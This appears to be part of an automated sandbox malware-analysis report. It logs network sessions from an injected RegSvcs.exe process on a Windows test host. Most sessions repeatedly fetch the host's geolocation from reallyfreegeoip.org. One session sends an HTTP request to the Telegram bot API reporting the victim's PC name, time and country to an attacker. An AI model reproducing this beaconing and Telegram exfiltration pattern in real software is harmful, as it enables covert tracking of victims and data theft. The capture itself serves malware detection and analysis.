2024-09-25 13:34:22 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49722 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:23 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-09-25 13:34:23 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 25 Sep 2024 13:34:23 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-25 13:34:23 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49729 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:32 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:32 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:32 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23331
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jboQZB5zUNjbvp7YZ%2F42hYxMphb%2BtfozQ67%2FbFkkPGIgoJEJA3jfn4rlsV4RPfEDkVYk7vCYvxmbO7FYfBrHsZHvIll0PIWjWv43%2BixacsFz2o4rZP94hk3ADBpN0R64zYG8PLgf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b646b6fe24405-EWR
2024-09-25 13:34:32 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:32 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-09-25 13:34:33 UTC | 680 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:32 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23331
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUHTArL6vG1wS9koEaKNZiPqdpj9x2xbZ5BRhPdxbNcICAa8Vo01gKAIuPplOkcEb%2FqbQkXvLAGIjtQ6aWRfQeDYWJ0dY%2F8Ywxw1MGuI5H6v9a2%2FjQI%2BGwnp%2FT5WfksImIFBbain"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b646ffa2743be-EWR
2024-09-25 13:34:33 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:34 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:34 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:34 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23333
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiS1wvXXsgjUFkvMt8qo9b61rUdGTn74Cd9066PVpth%2F95UbVK%2FFw3oZoueSW4M8JodrUk3uKZVEcfRUU3cRp6TSGu5ax4uJZkOOfCbxgCFhuNfOv0dRMuM0%2FtivcgTERU%2Fo6O0q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b6477eb341a28-EWR
2024-09-25 13:34:34 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:35 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:35 UTC | 676 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:35 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23334
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vERzl16CutZrQvlc14nlt6y1hOOOfrPMZxCphwRja8LtSqqjdbY6u1pi99IA4%2F9tFstcAM5ldx8PW8fWDUJW6cBKej%2BPepBwckfcpKNHGP0l%2F9XJApx6Yqizcx1qGdHpudPVbxzF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b647fcac84245-EWR
2024-09-25 13:34:35 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49736 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:36 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-09-25 13:34:36 UTC | 680 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:36 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23335
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BgWsMl2zpfgenJgICZspGKzVHC2yqerE0WJewdbOOr59MdFpb5z7x2yCr5zgqlrQUCQVULk%2BXSDkXA9dBr%2FczRJ%2F7L8ZcYj3k%2F9b0yu6EBt0P9GmDxkE1rPpDqog8KyTisuFQTx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b648698a34345-EWR
2024-09-25 13:34:36 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:37 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:37 UTC | 680 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:37 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23336
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEzon3ad0%2FHizUJDlIQRrgSvHlLRumYL33c6csx7VFu6GA5Yt79Nyh6rfZzzJiVPtt4a60YNsJ8Mgb%2FpkGifxy8WfWvFS1HU8ScjHH%2FS7eFN00bxA%2F%2F8pjdxfaUpq9BJ7osQ9bKW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b648d7f0c4232-EWR
2024-09-25 13:34:37 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 16 | Source IP: 192.168.2.5 | Source Port: 49740 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6488 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:38 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:39 UTC | 674 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:39 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23338
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIj4Rstc6xOk%2FQjH7H1NovWOtSeQ1LW%2FL3ummIgTYB6K9xvH7Ngk6OaAHNZITA1wEvnPdcNKgzyLRmQS0VXlvdJ69ge7fa36b4WapKHFlU9LK5ovryqWRZao1eSYEQH0BkaamJNF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b6495cf6ac3fd-EWR
2024-09-25 13:34:39 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.549742188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:40 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:40 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:40 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23339
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7j5bmjgMX29ONH24%2B0w0O2QbseksYD%2F41PNCUGyP%2FrCt0CDUbbz5NF86YjJXGv%2BQhTLqNhVO9%2BOBTBTW2zUvs6cTmQ8xJrs1B3V4KYSM15T2WeZwgHxNGCgHdpP6aLgT2dUUmxU"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b649c9f457c99-EWR
                                                                    2024-09-25 13:34:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    18 | 192.168.2.5 | 49744 | 188.114.97.3 | 443 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-09-25 13:34:41 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:41 UTC | 672 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:41 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23340
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zo4WbkH%2Foe7vdkqBsTv1StHPX2oJ79gp7KbOBAXfPm7nzhI3uQzsjzmR2fzPgO0I2UY17tX4L6yZelynmP3SK2LKnUIiXqabwCd71dUf0bR2VHCT7UUMaV5SLSsNdapAeMExxy9y"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b64a509098cdd-EWR
                                                                    2024-09-25 13:34:41 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
